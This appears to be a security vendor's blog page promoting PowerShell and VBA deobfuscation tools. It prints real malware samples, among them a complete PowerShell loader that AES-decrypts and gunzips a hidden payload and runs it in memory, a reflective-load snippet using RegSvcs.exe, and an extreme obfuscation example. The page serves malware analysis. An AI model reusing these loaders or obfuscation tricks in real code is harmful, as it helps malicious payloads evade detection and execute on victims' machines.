Extreme PowerShell Obfuscation

We recently stumbled upon an old article by Daisuke Mutaguchi explaining an extreme technique for PowerShell obfuscation. The article is in Japanese, so you may have to use Google translate.

Here’s the final example provided by the author of the article:

${;}=+$();${=}=${;};${+}=++${;};${@}=++${;};${.}=++${;};${[}=++${;};
${]}=++${;};${(}=++${;};${)}=++${;};${&}=++${;};${|}=++${;};
${"}="["+"$(@{})"[${)}]+"$(@{})"["${+}${|}"]+"$(@{})"["${@}${=}"]+"$?"[${+}]+"]";
${;}="".("$(@{})"["${+}${[}"]+"$(@{})"["${+}${(}"]+"$(@{})"[${=}]+"$(@{})"[${[}]+"$?"[${+}]+"$(@{})"[${.}]);
${;}="$(@{})"["${+}${[}"]+"$(@{})"[${[}]+"${;}"["${@}${)}"];
"${"}${.}${[}+${"}${)}${@}+${"}${+}${=}${+}+${"}${+}${=}${&}+${"}${+}${=}${&}+${"}${+}${+}${+}+${"}${[}${[}+${"}${.}${@}+${"}${+}${+}${|}+${"}${+}${+}${+}+${"}${+}${+}${[}+${"}${+}${=}${&}+${"}${+}${=}${=}+${"}${.}${.}+${"}${.}${[}|${;}"|&${;};

Yes, this is valid PowerShell.

Although there are limits to static deobfuscation, we decided to see what can be done about this with the new release of our PowerShell Beautifier package.

Continue reading “Extreme PowerShell Obfuscation”

PowerShell Beautifier 2.0 Package

We have released version 2.0 of our commercial PowerShell Beautifier package. The new release adds the option to remove unused variables.

For example, this is a snippet of a malicious script:

$T = 'Get'
$M = $T + 'Method'
$I = 'Invoke'
$T = $T + 'Type'
$L = 'Load'
$Q0 = [Reflection.Assembly]
$B = $Q0::$L($MyS)
$B = $B.$T('NewPE2.PE')
$B = $B.$M('Execute')

$Ub = 'C:\Windows\Microsoft'
$z = $Ub + '.NET\Framewor'
$VT = $z + 'k\v4.0.30'
$XQ = $VT + '319\RegSvcs.exe'
$B = $B.$I($null,[object[]] ($XQ,$serv))

With both variable replacement and removal of unused variables enabled it becomes:

$load_result = [Reflection.Assembly]::Load($x_result)
$get_type_result = $load_result.GetType('NewPE2.PE')
$get_method_result = $get_type_result.GetMethod('Execute')
$invoke_result = $get_method_result.Invoke($null, [object[]]('C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe', $x_result_2))

PowerShell Beautifier Package

PowerShell code is often seen in malware. To help the analysis of such code we have just released the “PowerShell Beautifier” package. The package is available to all commercial licenses of Cerbero Suite Advanced.

The package features a complete parser for the PowerShell language and has many deobfuscation capabilities. If your organization is interested in integrating our PowerShell beautifier in a cloud service, please contact us.

The beautifier can be invoked as an action: Ctrl+R -> PowerShell -> PowerShell Beautifier.

Let’s look at an example of obfuscated PowerShell code:

$mcWPL = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join 
'')('%~f0').Split([Environment]::NewLine);foreach ($jBqHb in $mcWPL) { if 
($jBqHb.StartsWith(':: ')) {  $qUflk = $jBqHb.Substring(3); break; }; };$AKzOG = 
[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($qUflk);$GTqqO = 
New-Object System.Security.Cryptography.AesManaged;$GTqqO.Mode = 
[System.Security.Cryptography.CipherMode]::CBC;$GTqqO.Padding = 
[System.Security.Cryptography.PaddingMode]::PKCS7;$GTqqO.Key = 
[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join 
'')('rYCDvAfAeZYTmiLeZKnw0z4us9jgkCckB7mS60qxxg4=');$GTqqO.IV = 
[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join 
'')('JYh62EWEKCuIH7WrUJ0VdA==');$QTfFw = $GTqqO.CreateDecryptor();$AKzOG = 
$QTfFw.TransformFinalBlock($AKzOG, 0, 
$AKzOG.Length);$QTfFw.Dispose();$GTqqO.Dispose();$xVFCH = New-Object 
System.IO.MemoryStream(, $AKzOG);$qGLhv = New-Object 
System.IO.MemoryStream;$wRtOX = New-Object 
System.IO.Compression.GZipStream($xVFCH, 
[IO.Compression.CompressionMode]::Decompress);$wRtOX.CopyTo($qGLhv);$wRtOX.Dispose
();$xVFCH.Dispose();$qGLhv.Dispose();$AKzOG = $qGLhv.ToArray();$VBqqY = 
[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($AKzOG);$ReoQh = 
$VBqqY.EntryPoint;$ReoQh.Invoke($null, (, [string[]] ('%*')))

Continue reading “PowerShell Beautifier Package”

Video: In-Depth Obfuscated VBA Analysis

This script concatenates strings such as “a” + “b”:

from Pro.UI import *
import re

ctx = proContext()
v = ctx.getCurrentView()
if v.isValid() and v.hasSelection():
    s = v.getSelectedText().replace('" &', '" +')
    s = eval(s)
    v.setSelectedText('"' + s + '"')

This second script decrypts strings the same way as the “NobosMeik” function:

from Pro.UI import *
import base64

ctx = proContext()
v = ctx.getCurrentView()
if v.isValid() and v.hasSelection():
    s = v.getSelectedText()
    s = base64.b64decode(s)
    key = b"versache"
    s2 = bytearray(s)
    y = 0
    tire = lambda r, g: (r & ~g) | (~r & g)
    for x in range(len(s)):
        s2[x] = tire(s2[x], key[y])
        if y < len(key) - 1:
            y += 1
        else:
            y = 0
    print(s2)